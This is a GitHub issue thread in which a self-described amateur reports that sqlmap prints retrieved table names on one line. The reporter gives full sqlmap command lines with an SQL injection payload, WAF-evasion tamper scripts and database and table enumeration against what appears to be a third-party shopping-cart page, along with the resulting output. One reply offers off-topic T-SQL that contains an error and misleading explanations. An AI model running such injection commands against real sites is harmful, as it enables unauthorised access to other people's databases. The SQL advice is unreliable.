### ISSUE TITLE
sqlmap is not outputing all the tables and extracting them in one line

### ISSUE THREAD

**Issue by ZED022** [sqlmapproject/sqlmap#3893]
sqlmap is not Extracting all the tables
Hello, i'm amateur in sqlmap , i was trying to extract tables , it shows that sqlmap extracting tables on the same line then output just one table

 sqlmap.py -u https://www.site.com/cart.php --data="addtocartBt=add%20to%20cart&productId=2299%20AND%203*2*1%3d6%20AND%20224%3d224&pst=7&quantity=3&variants%5b730%5d=2125" -p productId --no-cast --tamper=randomcase,between,space2comment --level 3 --risk 3 --dbs 

it gaves me this output: 

[09:25:50] [INFO] used SQL query returns 2 entries
[09:25:50] [INFO] resumed: '2','information_schema'
[09:25:50] [INFO] resumed: '2','information_schema','database'
available databases [3]:
[*] 2
[*] information_schema
[*] database

then if i would extract the tables 

sqlmap.py -u https://www.site.com/cart.php --data="addtocartBt=add%20to%20cart&productId=2299%20AND%203*2*1%3d6%20AND%20224%3d224&pst=7&quantity=3&variants%5b730%5d=2125" -p productId --no-cast --tamper=randomcase,between,space2comment --level 3 --risk 3 -D information_schema --tables

it shows like that : 

[07:06:03] [INFO] used SQL query returns 62 entries
[07:06:03] [INFO] starting 10 threads
[07:06:05] [INFO] retrieved: '62','COLLATION_CHARACTER_SET_APPLICABILITY'
[07:06:05] [INFO] retrieved: '62','COLLATION_CHARACTER_SET_APPLICABILITY','FI...
[07:06:05] [INFO] retrieved: '62','COLLATION_CHARACTER_SET_APPLICABILITY','FI...
[07:06:05] [INFO] retrieved: '62','COLLATION_CHARACTER_SET_APPLICABILITY','FI...

[07:06:09] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[07:06:11] [WARNING] user aborted during enumeration. sqlmap will display partial output
Database: 62
[1 table]
+---------------------------------------+
| COLLATION_CHARACTER_SET_APPLICABILITY |
+---------------------------------------+
and it output one table 
![a](https://user-images.githubusercontent.com/54448760/63608009-6d9fe200-c5c3-11e9-9e24-295e5079e1b5.jpg)

![a](https://user-images.githubusercontent.com/54448760/63609084-ee5fdd80-c5c5-11e9-8653-198478e46521.jpg)

**Comment by stamparm** [comment]
Where is a filled report form?

**Comment by uzo3011** [comment]
Bonjour,

I am new to SQL, so this answer is likely to be incorrect.

Try this code:

DECLARE @Name_of_List nvarchar(max)


Select @Name_of_List - coalesce(@Name_of_List, ' ') + cast(isnull(ColumnTitle, ' ') as nvarchar)
from(
Select distinct ColumnTitle
from TableName
)AnyName

Select @Name_of_List

Notes:

- We start with declare so that SQL recognises your column as a new variable, this allows us to represent that variable as a list of numbers (or whatever your data type happens to be). 

- Nvarchar(max) ensures that the maximum storage space is available for your list.

- The cast function converts your data into the numerical datatype.

- Is null prevents the problem of having an entire string rendered null because of one null value. The parentheses with a space means that a null value will be replaced with a blank.

- Coalesce makes sure that only the first non-null value is counted, and any nulls are replaced with a blank.

- Distinct ensures that duplicates are not counted, which will reduce computation time.


Bonne chance!
